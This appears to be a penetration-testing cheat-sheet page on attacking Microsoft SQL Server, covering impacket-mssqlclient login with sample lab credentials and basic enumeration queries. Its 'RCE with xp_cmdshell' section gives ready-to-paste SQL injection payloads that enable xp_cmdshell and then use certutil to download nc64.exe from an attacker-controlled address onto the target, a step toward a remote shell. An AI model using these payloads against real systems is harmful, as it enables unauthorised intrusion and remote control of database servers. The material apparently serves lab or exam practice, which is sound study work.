MSSQL

SQLCMD

A Windows built-in command-line tool that allows SQL queries to be run through the Windows command prompt or remotely from another machine.

Impacket-MSSQLClient

Impacket includes a tool (impacket-mssqlclient) that can be used to connecyt to a Windows machine running MSSQL. Be sure to use the -windows-auth keyword to use NTLM authentication.

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth

MSSQL Console Commands

When using an SQL Server command line tool like sqlcmd, we must submit our SQL statement ending with a semicolon followed by GO on a separate line. However, when running the command remotely, we can omit the GO statement since it's not part of the MSSQL TDS protocol.

Show MSSQL version:

SELECT @@version;

List all available databases:

SELECT name FROM sys.databases;

List tables in a database:

SELECT * FROM tampdb.information_schema.tables;

List all elements in a table:

select * from tampdb.dbo.users;

We must specify the dbo table scheme between the database and the table name.

RCE with xp_cmdshell

1';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE--
try this and then 1';EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.x/nc64.exe c:/windows/temp/nc64.exe';--
if you do not get a hit in your webserver, let me know

1';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE--
then
1';EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.x/nc64.exe c:/windows/temp/nc64.exe';--

PreviousMySQL NextEnable xp_cmdshell

Last updated 10 months ago